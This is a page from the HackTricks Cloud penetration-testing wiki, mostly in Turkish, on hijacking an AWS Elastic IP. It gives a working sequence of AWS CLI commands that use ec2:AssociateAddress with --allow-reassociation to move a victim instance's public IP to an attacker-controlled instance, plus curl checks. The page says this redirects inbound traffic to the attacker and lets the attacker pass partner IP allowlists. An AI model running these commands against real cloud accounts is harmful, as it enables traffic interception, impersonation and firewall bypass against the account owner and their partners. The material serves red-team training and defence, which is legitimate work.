AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• Abonelik planlarını kontrol edin!
• Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
• PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.

Özet

Abuse ec2:AssociateAddress (ve isteğe bağlı olarak ec2:DisassociateAddress) kullanarak bir Elastic IP (EIP)’yi kurban instance/ENI’den saldırgan instance/ENI’ye yeniden ilişkilendirin. Bu, EIP’ye yönelen gelen trafiği saldırgana yönlendirir ve ayrıca saldırganın izin verilen genel IP ile giden trafik başlatmasına izin vererek harici ortakların güvenlik duvarlarını atlamasını sağlar.

Önkoşullar

• Hedef EIP allocation ID aynı hesap/VPC içinde.
• Kontrolünüzde olan attacker instance/ENI.
• İzinler:
• ec2:DescribeAddresses
• ec2:AssociateAddress EIP allocation-id ve attacker instance/ENI üzerinde
• ec2:DisassociateAddress (isteğe bağlı). Not: --allow-reassociation önceki ilişkilendirmeyi otomatik olarak kaldırır.

Saldırı

Değişkenler

REGION=us-east-1
ATTACKER_INSTANCE=<i-attacker>
VICTIM_INSTANCE=<i-victim>

1. Kurbanın EIP’sini ayırın veya tespit edin (lab yeni bir tane ayırır ve kurbana iliştirir)

ALLOC_ID=$(aws ec2 allocate-address --domain vpc --region $REGION --query AllocationId --output text)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $VICTIM_INSTANCE --region $REGION
EIP=$(aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION --query Addresses[0].PublicIp --output text)

2. EIP’in şu anda victim service’e çözüldüğünü doğrulayın (örnek: banner kontrolleri)

curl -sS http://$EIP | grep -i victim

3. EIP’yi attacker’a yeniden ilişkilendir (victim’den otomatik ayrılır)

aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $ATTACKER_INSTANCE --allow-reassociation --region $REGION

4. EIP’nin artık attacker servisine çözüldüğünü doğrulayın

sleep 5; curl -sS http://$EIP | grep -i attacker

Delil (taşınmış ilişkilendirme):

aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION \
--query Addresses[0].AssociationId --output text

Etki

• Inbound impersonation: Hijacked EIP’ye gelen tüm trafik attacker instance/ENI’ye yönlendirilir.
• Outbound impersonation: Attacker, allowlisted public IP’ten geliyormuş gibi görünen trafiği başlatabilir (partner/dış kaynak IP filtrelerini atlatmak için kullanışlı).

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• Abonelik planlarını kontrol edin!
• Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
• PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.